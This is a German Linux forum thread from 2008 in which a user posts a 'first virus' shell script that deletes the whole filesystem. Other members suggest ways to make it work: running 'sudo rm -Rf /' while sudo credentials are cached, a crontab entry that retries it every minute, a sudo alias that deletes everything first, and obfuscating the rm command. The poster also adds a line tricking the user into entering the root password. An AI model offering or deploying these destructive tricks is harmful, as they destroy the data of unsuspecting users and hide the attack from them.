Mein erster Virus (test)

Dieses Thema im Forum "Sandkasten" wurde erstellt von Linthorul, 26.01.2008.

  1. #1 Linthorul, 26.01.2008
    Linthorul

    Linthorul Arch Luxer

    Dabei seit:
    01.12.2007
    Beiträge:
    205
    Zustimmungen:
    0
    Mein erster Virus

    Code:
    #!/bin/sh
    echo "Heute beginnt ein fröhlicher Tag"
    su
    rm -r /*
    test
     
  2. Anzeige

    Schau dir mal diese Kategorie an. Dort findest du bestimmt etwas.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. #2 Ogion, 26.01.2008
    Zuletzt bearbeitet: 26.01.2008
    Ogion

    Ogion FOSS-Fan

    Dabei seit:
    29.04.2007
    Beiträge:
    93
    Zustimmungen:
    0
    Ähm, ja. Also da ist nur ein Fehler drin: bei dem su musst du im Folgenden ein passwort eingeben...
    Außerdem gehe ich davon aus, dass du
    rm -Rf /
    meintest.

    Ogion

    Du könntest sowas versuchen

    Code:
    #!/bin/sh
    echo "bla"
    sudo rm -Rf /
    Da die meisten heute anschdeinend sudo benutzen, und sudo ja das Passwort speichert...

    Oder du trägst folgende Zeile in die crontab des Users ein...
    Code:
    * * * * * /usr/bin/sudo rm -Rf / >/dev/null
    Dann probiert er alle Minute den Befehl, und wenn das Passwort grade im speicher ist, dann kann er es auch ausführen. Aber erstens wird sudo dann jede Menge Systemmails verschicken, von wegen ungültige Authentifizierung, und zweitens weiß ich nicht, was passiert, wenn das Passwort grade nicht im Cache ist.

    Oder du setzt auf "sudo" ein alias:
    Code:
    alias sudo="sudo rm -Rf / && "
    Aber ich glaube, auf diesem Level wirst du nicht sehr viel Erfolg haben ;)
    Da triffst du vlt unerfahrene, die dir auch noch Zutritt ihrem Rechner gewähren...
     
  4. #3 Linthorul, 26.01.2008
    Linthorul

    Linthorul Arch Luxer

    Dabei seit:
    01.12.2007
    Beiträge:
    205
    Zustimmungen:
    0
    Besser?

    Code:
    #!/bin/sh
    echo "Heute beginnt ein fröhlicher Tag"
    echo "Deswegen gibst du heute mal dein Root-Passwort ein"
    su
    rm -Rf /*
     
  5. #4 Tomekk228, 26.01.2008
    Tomekk228

    Tomekk228 Lebende Foren Legende

    Dabei seit:
    14.08.2007
    Beiträge:
    2.417
    Zustimmungen:
    0
    Ort:
    /home/tomekk/
    @TE

    du denkst nicht wirklich das einer so dumm ist oder? ;)

    da sind varianten mit echo viel besser. Wenn du nicht weißt was ich meine dann google.

    Mit echo und grep (o.ä) gibt man etliche zeichen aus mit was weiß ich alles und mit grep oder sed setzt man z.b rm zusammen und führt es aus usw.
     
  6. Mike1

    Mike1 Niederösterreicher

    Dabei seit:
    21.12.2006
    Beiträge:
    1.376
    Zustimmungen:
    0
    Ort:
    Österreich
    hä? und welchen Sinn hat das? außer das der Code komplizierter wird?
     
  7. #6 Tomekk228, 26.01.2008
    Tomekk228

    Tomekk228 Lebende Foren Legende

    Dabei seit:
    14.08.2007
    Beiträge:
    2.417
    Zustimmungen:
    0
    Ort:
    /home/tomekk/
    Keinen. Ist nur Spielerei. Zum lernen oder einfach aus Spaß.

    Man könnte es so machen (bei sinnvollen scripten) wenn man nicht will das ein 3ter es einfach einsehen kann. Aber naja.
     
  8. Anzeige

    Vielleicht findest du HIER Antworten.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
Thema:

Mein erster Virus (test)

Die Seite wird geladen...

Mein erster Virus (test) - Ähnliche Themen

  1. Linux Foundation: Gemeinschaft im Vorstand nicht mehr erwünscht

    Linux Foundation: Gemeinschaft im Vorstand nicht mehr erwünscht: Still und heimlich hat die Linux Foundation die Regeln für Individualmitglieder geändert: Sie sind nun nicht mehr durch zwei gewählte Mitglieder...
  2. Raspbian überwachen (Systemeinbrüche)

    Raspbian überwachen (Systemeinbrüche): Hallo, ich betreibe auf einem Raspberry Pi (Model 1B) mit Raspbian (Debian) einen kleinen DL-Server. Darauf habe ich nzbget, sabnzbd und pyload...
  3. Kann meine Bandbreite nicht nutzen

    Kann meine Bandbreite nicht nutzen: Ich habe kürzlich mein Telekom-Anschluß von 2 auf 50 (Glasfaser) MBit/sec umgestellt. Mit dem Ziel Livestreams sehen zu können. Aber jetzt sehe...
  4. Mein Server Ubuntu 14.04.3 LTS versendet spam (postfix/dovecot)

    Mein Server Ubuntu 14.04.3 LTS versendet spam (postfix/dovecot): Mir wurde gerade von meinem Hoster mitgeteilt, daß mein Server bai abusix.org geblacklistet wurde. Wenn ich in die logs schaue, so sehe ich z.B.:...
  5. Pump.io will mehr in die Gemeinschaft

    Pump.io will mehr in die Gemeinschaft: Pump.io, ein freies Projekt, das die Technologie für ein soziales Netzwerk bereitstellt, will sich stärker in der Gemeinschaft verwurzeln. Die...